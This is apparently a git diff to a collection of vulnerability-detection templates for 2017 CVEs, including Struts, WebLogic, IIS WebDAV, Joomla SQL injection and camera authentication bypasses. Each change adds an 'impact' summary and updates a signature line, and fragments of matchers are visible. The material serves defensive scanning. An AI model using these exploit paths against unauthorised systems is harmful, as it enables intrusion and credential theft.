-# digest: 4a0a00473045022034e653e41c3e05659473a8992fe6a76ca1aeacb896c8140f82cf30a7e99e799b022100bbe58c4d39469289f66e0623fe446ee744e5061ff8d12abb23b4e211a9250356:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200156b1483e903ad84bb18d6c750cc7ed2dd09109d3cf8cb46eefe214a845b3d3022100becfb5c3c4f27c34f7668c14ccf18df54ca5a1edef33c06c4b3663dd683b6064:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml
index e5ee583656..a0a8240e5b 100644
--- a/http/cves/2017/CVE-2017-17736.yaml
+++ b/http/cves/2017/CVE-2017-17736.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.
+  impact: |
+    An attacker can gain administrative privileges on the Kentico CMS system.
   remediation: |
     Upgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - "Database Setup"
           - "SQLServer"
         condition: and
-# digest: 4a0a004730450220275c483b4077d073e7ebf97b131f7c4a192500af6468ad71c7584ead4ace8edc0221009794db374c2a86103fbe9990b1a94a29806d48b28cba306faf58d51ffb76244e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d8309e4dcc4cb24832be6568404f920ce2d2a9537ebc8d4daf24e2a2f4a32fb0220488a5086a1b45f2b241f9aefb4f63e4f1b5e6002b72d0399d73ff793bf3a4213:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml
index 02e685682b..d980b4e413 100644
--- a/http/cves/2017/CVE-2017-18024.yaml
+++ b/http/cves/2017/CVE-2017-18024.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of AvantFAX or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100de53369248eb5fe9eca9f5a6238f8df2cfe6f1e28dc5c6683f1bb8b64da48837022061a2c2338f9ea345a9fa94cb95645369d7536d13e1190710bbee112a8c68dfa6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d45b414e76619a9ffcccb6c9966a573c4e8379c7d4cdb93c05ee828e5ba2f5b202203b05a6ca78bfacf9803a27c2cbf925878b02fce3cd5e8508793391ac31ba718c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml
index 12a0e0ca80..6228a0c036 100644
--- a/http/cves/2017/CVE-2017-18536.yaml
+++ b/http/cves/2017/CVE-2017-18536.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.
+  impact: |
+    This vulnerability allows remote attackers to execute arbitrary script or HTML code in the context of the victim's browser, potentially leading to session hijacking, phishing attacks, or defacement of the affected website.
   remediation: |
     Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022057f2280d0d5cc205ad98058980ffab68dc346fb0f3158864ec2277cd62b163a6022019fc34fe758f0ccaf78c25656061a12456a5059e5cfb3118f516d52917c8685b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207636f90f1f13be2fb4123bf2a2a003aedf7808964a56bac0def0932465479b78022033cbd69edf1a73411c1d14cc327c94531fc81ee7e24746c556887f6f80ff40f2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml
index dc95ecf56c..258c5ab66a 100644
--- a/http/cves/2017/CVE-2017-18598.yaml
+++ b/http/cves/2017/CVE-2017-18598.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x
   severity: medium
   description: WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress Qards plugin, which includes a fix for this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: body
         words:
           - "console.log"
-# digest: 4a0a0047304502201bc22e0aa2e3e5fbd5b9fd8ca25217b91a55e8aae08033f3f6f2031fb28f2176022100cc498781b317a153082a494ab990b7ab55cfe9a0f52eae9710fc4a7ee02ca5a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022050c88ef260d0619e11218a28154fc7db52ec91359d29f4a59f5ba747ff343c21022100ec3b0241243c69bb63a072ebe60a1be1156805095362cc6101c49529687293fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml
index bc999d2312..26ee7da508 100644
--- a/http/cves/2017/CVE-2017-18638.yaml
+++ b/http/cves/2017/CVE-2017-18638.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
+  impact: |
+    An attacker can exploit this vulnerability to access internal resources, potentially leading to unauthorized access, data leakage, or further attacks.
   remediation: |
     Upgrade to a patched version of Graphite (>=1.1.6) or apply the necessary security patches.
   reference:
@@ -38,4 +40,4 @@ http:
         part: interactsh_protocol
         words:
           - "http"
-# digest: 4b0a00483046022100b9f0843cfb7e06a31293fc0c05a647489bec863e344d49b317f5f819990ef4e3022100cb81167fee82e154c010b97d194e571741874d35db0b43d05fb45baeaee0b8ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201306b79149a1759979fcdf09449b36e03f04b8a042c8ae32969a96357790f09702201b7a11d7eff916991c7ca651c1a2d4b65b4a3c9808c1bfde9c035e97338de547:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml
index 7ab0a9a471..af4e613608 100644
--- a/http/cves/2017/CVE-2017-3506.yaml
+++ b/http/cves/2017/CVE-2017-3506.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: high
   description: The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to fix this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a004730450221008177a3474ef9cdc40025decc1dd89bc1f64a0e2294fa58a6c197a4defdb45fcd02207ad83517f61792e8038df1078bc4617365d3104d551f35d10c83e74dc48acf60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220175917fef9b6461088885f0b91b311e26395c58ca2bc859870e8b817dff156a90220655034f392342c9cc848968901687aa91fa4aac8161478107729a2a0c2d10652:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml
index 1f1a274af7..c7a10196d9 100644
--- a/http/cves/2017/CVE-2017-4011.yaml
+++ b/http/cves/2017/CVE-2017-4011.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized access to sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by McAfee to mitigate the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4a0a00473045022100f130864a3da871efc07d62b8166a93fe2aa2c35f3f842c8b4b8c7e4841e53e31022073ffca96edbeb147989e06dc51fb3bfe628d7ed86d828203de8b41b419408965:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008ca4559e5a6f00aa527d1a1048a85bf4b505772a02456c51b48f78474ed8bf16022100b8d7de7fbe7c46b94a8ca4c3010fac2db56b7400480cab0fe72203ff618a3193:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml
index 403930ff1d..c96a2cf7c9 100644
--- a/http/cves/2017/CVE-2017-5487.yaml
+++ b/http/cves/2017/CVE-2017-5487.yaml
@@ -5,6 +5,8 @@ info:
   author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
   severity: medium
   description: WordPress Core before 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows a remote attacker to obtain sensitive information via a wp-json/wp/v2/users request.
+  impact: |
+    An attacker can easily determine valid usernames, which can lead to targeted attacks such as brute force attacks or social engineering.
   remediation: |
     Update WordPress to version 4.7.1 or later
   reference:
@@ -63,4 +65,4 @@ http:
           - '.[] | .slug'
           - '.[].name'
         part: body
-# digest: 4a0a004730450221008e0bd15d5ab220b67bf0f58679c061d9d79c5305c43499fe828e9c57d9537a17022061b8c81dbf310bff8c7211643d0e10593f11dade6848255176529cc308237cda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012362c3e5d6328b56620ca5ba033d652c01140ab49135a379f1fc623d1dabc80022100b3f06e821337ae0f1da2edea5c31e37a8c383e1c92dbec597ea16233f6d6491e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml
index 255e6461c9..c95111f93c 100644
--- a/http/cves/2017/CVE-2017-5521.yaml
+++ b/http/cves/2017/CVE-2017-5521.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.
   remediation: |
     Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c13b08f6df8de58c836664fb8d8456bb47bb284c1cc624c4cc8aa57689060569022100d27cdeb185c5fa023e29a966dc73b59521191b41fab703a1cb23695f94efec5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022049cc47bd934d92822b69ef3ae0b679bac2f61d2d3c05e2ba84c0daa804b94bd9022100b0daa20a36023cb335bcef703a4be02cbdbe8a2635e52659d0007a0504415f6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml
index e6bde3a78f..37e6657b09 100644
--- a/http/cves/2017/CVE-2017-5631.yaml
+++ b/http/cves/2017/CVE-2017-5631.yaml
@@ -5,6 +5,8 @@ info:
   author: edoardottt
   severity: medium
   description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a18ce04a9837c75ebb7684f9910bf72ce4ee6051ea7a02edc24b2aae3a383d0f022100dec0fb5a72d56a015f87ffa0572e3e2226c66baa2c7fa82c62c1187f95071b4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f40cf04bd12a4315fae5af77ff6dab6c4c2de3fb391356745992aa71a6feb8d022035b63f7ee7c589465ac060e6cdaabd793cb33ba4711442416dda651a72dc0f78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml
index 6517334f88..f89dc4f11d 100644
--- a/http/cves/2017/CVE-2017-5638.yaml
+++ b/http/cves/2017/CVE-2017-5638.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.
+  impact: |
+    Remote attackers can execute arbitrary commands on the target system.
   remediation: |
     Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.
   reference:
@@ -46,5 +48,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502202407ca8e28f3783a14692497a7204673ec4edccefcb345d7da71d5070bbd0e3e022100d120da2dc23a55d8439a1c6985ceba81ac96076efa0cd41171db47cebea1668f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fbe4f775fe83ed866915c29662a0884710cb6849a95fee93c60cd278c9551e9c022100e229c1ef4b96aeade9ffc8da95cc64cc3d6b75a4ec70d80dd7741a024d29a576:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml
index d4a0cfc3ef..c2c9cb07a3 100644
--- a/http/cves/2017/CVE-2017-5689.yaml
+++ b/http/cves/2017/CVE-2017-5689.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Intel Active Management platforms are susceptible to authentication bypass. A non-privileged network attacker can gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability. A non-privileged local attacker can provision manageability features, gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology, Intel Standard Manageability, and Intel Small Business Technology. The issue has been observed in versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for all three platforms. Versions before 6 and after 11.6 are not impacted.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the Intel Active Management firmware, potentially leading to unauthorized control of the affected system.
   remediation: |
     Update the Intel Active Management firmware to version 11.6.55, 11.7.55, 11.11.55, 11.0.25, 8.1.71, or 7.1.91 to mitigate the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c8a8964ac911d80b8bd68120abe723b36b79cabf6110d25e06a4aff279eaee4302204d37c271d384d98e2befb34212e1743e932e60ca43235b1b3a1483cdbcf2a2f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203674b13569954ddcb49c7a9fd1e250449dfbd965c265f88299a6597ec0b3401302204fa71f5cb267e9c191f41e21e6f67db25f2b6505760f156dc7c65c6d7c5c753d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml
index c59dbb8de4..164fb4fc21 100644
--- a/http/cves/2017/CVE-2017-6090.yaml
+++ b/http/cves/2017/CVE-2017-6090.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: high
   description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
   remediation: |
     Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210099132734cccfaf8bf298ca9150d76747e0dda63b55da13318e27fdbc8f6ad958022100bc4df2148e4639c1a281733ab8a194518b7d294bb6b7972e25d4fa0e7674d1e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c19f020aa6bfccbac6868aec75c0c00e20aef7662cde28d4789958cdb958eb23022014ef665f00ba30656739a02baf1c80ec9a2d21070fe41be89d0a4efebe7e470f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml
index dc0e5e6174..05f932de93 100644
--- a/http/cves/2017/CVE-2017-7269.yaml
+++ b/http/cves/2017/CVE-2017-7269.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with "If <http://" in a PROPFIND request.
+  impact: |
+    Allows remote attackers to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a supported version of Windows Server and IIS, or apply the necessary security patches.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022079444559f37615d899edf3c36965d9282d0cffefa84119373cc2c01bdd458be40220732de7c741bf5fe930acb12bcd8f9fdf85ffdedc24a0a73164b52a02add2ac0a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200905959bdf8b3c52f5651d687c22d12b182f9c03ddd0e8105a5aeb3a66f46965022100a59cf1e2d4a9d2658e48ed9b77627a247c8ce86a9792a0a28fa86d87b4c96cdc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml
index b99ce4b5ed..94ddb0d403 100644
--- a/http/cves/2017/CVE-2017-7391.yaml
+++ b/http/cves/2017/CVE-2017-7391.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a20100b896f540f6b8689eebbfde92c81d48821ad13d966e94efff9f06680c42022100b8653ea1fa3686bae4e534656094370da4e2b6bb49278a07960317317afc1071:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b0f51360d33162a65e7c4ce59fa9fc61dabbcded30b948b60a6fec88ee9dbb5a02201511e43a79f67714df296145d958a26b04891d71c7453ff1c896eda4a54f440c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml
index 2d41f6a5c2..9fe0c39a2e 100644
--- a/http/cves/2017/CVE-2017-7615.yaml
+++ b/http/cves/2017/CVE-2017-7615.yaml
@@ -10,6 +10,8 @@ info:
   severity: high
   description: |
     MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.
   remediation: |
     Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100de231feb6b8932197960e1c57ddebde78b28207d53d14b46caa92c754a100394022073cf98118f08ba854222b13d830fe363f2707ed953d0cebbec2bd2a7fc81d565:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008e22cb923cf339467d711031932cc68618e58bf07d6e109415485a127957da45022100fde6cea8324f871c7c0697f1b28d26a9f89c8bc02404bc8708565726a63dede8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml
index a5f4f2571a..ccfcb02669 100644
--- a/http/cves/2017/CVE-2017-7921.yaml
+++ b/http/cves/2017/CVE-2017-7921.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential device takeover.
   remediation: |
     Apply the latest firmware update provided by Hikvision to fix the authentication bypass vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: header
         words:
           - "application/xml"
-# digest: 490a00463044022008ada916898d5f303dfb3c28c96f071ae699fd3b491b80da35218ace2c2b1f1102203732804c35165c03ae3d599b807e9f6220049898e9491f19cdd82a121d2f773b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205c55b69e712c5dfc42cb623113b3d6099efa4cf93ecd535ba15205e196b150b2022100e04e88aee3a9f03a417f1f24886271082665b682b7971dc10ec93d65a9b8c4f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml
index c13489eb22..a662e87ebe 100644
--- a/http/cves/2017/CVE-2017-7925.yaml
+++ b/http/cves/2017/CVE-2017-7925.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.
   remediation: |
     To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.
   reference:
@@ -45,4 +47,4 @@ http:
         group: 1
         regex:
           - 1:(.*:.*):1:CtrPanel
-# digest: 4a0a0047304502202e38cbfd157461dbf973c02e1eb0308890fb5841076ecc1f0eb3da6bc976196d022100ac3f1afae7d1cbb524695699e69ac22d50f3dad05f8fccc024d6c8dd626ea3f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009b4c15a7a1a24b4a7a821fbfe255234774fc91e625da5ed03ba0a8f9de19fe7c022100f7b352df1c00caccdc15d4242b81ce7ccdcae866d591811df1c9d8b7c8860d55:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml
index 09b684b977..32b4768733 100644
--- a/http/cves/2017/CVE-2017-8229.yaml
+++ b/http/cves/2017/CVE-2017-8229.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
+  impact: |
+    An attacker can gain unauthorized access to sensitive data.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bf184d47092ee9840421fbefa95840ed2f616872a2baa843458577f96dc0ba02022100e93aee6077a61c189ef96c45ce25d3320573874263aab89c353664af24917334:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ce0c0a06f46fe6df8ffa2c5acd9d6439e02706ae203a84b06d58e1ae036addf702210096d13ead0464983c2e4272364a8e2d1472bb584cc2207501294ad6b97bc9f8f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml
index 5f1fac6239..df6368bd23 100644
--- a/http/cves/2017/CVE-2017-8917.yaml
+++ b/http/cves/2017/CVE-2017-8917.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire Joomla! website.
   remediation: |
     Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
         part: body
         words:
           - '{{md5(num)}}'
-# digest: 490a0046304402205656b69bf63f9a3f156c059fa82ea1edfce3e8b634551a97c046b7e1e3f501ef022026dee59c01b4452ecb77ad9dce90dd7a21b53404ae033509f7ec59667f873641:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022002e8f8271fba712f8da2739697d742fd365a373c2230f2d7066d3ae4828266af0221009aaa6b110272e3ac9b5054679edcd78b911e17cb82e480432a4e18ff3567d5b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml
index 769ab7df6f..7d0ad11159 100644
--- a/http/cves/2017/CVE-2017-9140.yaml
+++ b/http/cves/2017/CVE-2017-9140.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, potentially leading to session hijacking, defacement of web pages, or theft of sensitive information.
   remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
   reference:
     - https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022015f4026c9e085bfa8dee2cb6cef2df35e8eba430fc469cb6e2bcdb1d2e0291d4022100c54a804096648641fc478a003026106703160700637aede611a3d89d51bb2655:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b3a8516317787834e151bad4141c425f981ec9cb3d72aa7b9d48a42aac07222902203bfdb8e6be6ef1eb9ed373294e43a701b7902739aa87514110e6101663118497:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml
index 0cd96603d1..497bb7d292 100644
--- a/http/cves/2017/CVE-2017-9288.yaml
+++ b/http/cves/2017/CVE-2017-9288.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
